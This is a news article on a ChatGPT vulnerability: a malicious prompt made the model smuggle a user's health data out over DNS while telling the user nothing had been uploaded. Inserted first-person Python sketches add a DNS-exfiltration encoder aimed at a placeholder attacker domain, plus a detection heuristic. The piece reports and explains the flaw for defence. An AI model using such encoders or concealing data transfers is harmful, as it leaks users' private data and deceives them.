OpenAI patches ChatGPT flaw that smuggled data over DNS

The Register / 3/31/2026


Key Points

  • OpenAI has released a patch for a ChatGPT vulnerability that could be used to smuggle data out via DNS queries.
  • The issue is described as bypassing typical outbound web-traffic controls because the exfiltration path used DNS rather than HTTP/HTTPS.
  • Security vendor Check Point reportedly noted that while outbound controls blocked web traffic, DNS traffic was overlooked and could still carry the data.
  • The incident underscores the need for organizations to monitor and restrict not just web protocols but also DNS and other “side-channel” egress paths.
  • The update is positioned as a security fix for potential data leakage, highlighting ongoing hardening work around LLM platforms’ network exposure.
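The monitoring gap flagged above can be made concrete. Below is a minimal, purely illustrative detection sketch (my own, not from the article or Check Point): DNS exfiltration typically shows up as unusually long, high-entropy subdomain labels, so scoring query names on those two properties is one simple way to watch the DNS egress path that outbound web controls miss. The thresholds are arbitrary assumptions for illustration.

```python
# Illustrative sketch only: flag DNS query names that look like data
# smuggling. Exfiltrated payloads tend to produce long, high-entropy
# leftmost labels, unlike ordinary hostnames such as "www" or "mail".
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a DNS label."""
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_exfil(qname: str, max_len: int = 40,
                     max_entropy: float = 3.5) -> bool:
    """Heuristic: long or high-entropy leftmost labels are suspicious.

    Thresholds are assumptions chosen for illustration, not tuned values.
    """
    first = qname.split(".")[0]
    return len(first) > max_len or label_entropy(first) > max_entropy
```

A hex-encoded payload label like `"0123456789abcdef..."` scores the maximum 4 bits per character and is flagged, while a name like `www.example.com` passes. Real deployments would pair a heuristic like this with allowlisted resolvers and per-zone query-rate limits.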

Check Point says outbound controls blocked web traffic but overlooked DNS

Mon 30 Mar 2026 // 19:36 UTC

OpenAI talks up data security for its AI services, yet Check Point says that ChatGPT allowed data to leak through a DNS side channel before the flaw was fixed.

In February, the free-spending AI biz fixed a data exfiltration vulnerability in ChatGPT that allowed a single prompt to bypass the notional safeguards OpenAI had put in place.

"We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation," researchers from Check Point said in a blog post on Monday.

It's not supposed to be that easy. OpenAI has implemented various safeguards around ChatGPT to limit data exfiltration by the various tools it can use. For example, the company says, "The ChatGPT code execution environment is unable to generate outbound network requests directly."

But Check Point researchers found that wasn't entirely correct.

"The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis," the researchers said. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."

That side channel? The Domain Name System (DNS), which resolves domain names into IP addresses.

The Check Point security bods explain that, while OpenAI prevents ChatGPT from communicating with the internet without authorization, it didn't have any controls on data smuggled via DNS.
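To see why DNS makes such an effective side channel, here is a minimal Python sketch of the general technique (my own illustration, not Check Point's proof of concept; the domain is a placeholder): the payload is hex-encoded and split into labels under the 63-character DNS limit, then appended as subdomains of an attacker-controlled zone, so merely resolving each name delivers a chunk to that zone's authoritative nameserver even when HTTP egress is blocked.

```python
# Illustrative sketch of DNS data smuggling (not Check Point's PoC).
# "exfil.example.com" is a hypothetical attacker-controlled zone.

def encode_for_dns(secret: bytes, attacker_zone: str = "exfil.example.com",
                   label_len: int = 60) -> list[str]:
    """Pack a secret into DNS query names, one chunk per name.

    Hex-encode the payload, split it into labels of at most label_len
    characters (DNS caps labels at 63), and prefix each chunk with a
    sequence number so the receiving nameserver can reassemble it.
    """
    hex_data = secret.hex()
    chunks = [hex_data[i:i + label_len]
              for i in range(0, len(hex_data), label_len)]
    return [f"{seq}-{chunk}.{attacker_zone}"
            for seq, chunk in enumerate(chunks)]

names = encode_for_dns(b"patient: Jane Doe, HbA1c 9.1%")
# Resolving names[i] (e.g. via socket.getaddrinfo) would leak chunk i
# in the DNS query itself, regardless of what the lookup returns.
```

Because the leak rides in the query name rather than in any HTTP request, controls that only inspect outbound web traffic never see it, which is exactly the blind spot Check Point describes.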

The security biz created three proof-of-concept attacks showing how this side channel might be abused. One involved a "GPT," a custom third-party app built on top of ChatGPT, that served as a personal health analyst.

In the demonstration, a user uploaded a PDF containing laboratory results and personal information for the GPT to interpret. The app did so, and when asked whether it had uploaded the data, "ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location."

Nonetheless, the GPT app transmitted the data to a remote server controlled by the attacker.

Flaws like this carry serious implications for regulated industries deploying AI services. Were a corporate AI service to leak this sort of data, it could amount to a GDPR violation, a HIPAA breach, or a breach of various financial compliance rules.

OpenAI is said to have fixed this particular issue on February 20, 2026. The AI biz did not immediately respond to a request for comment. ®
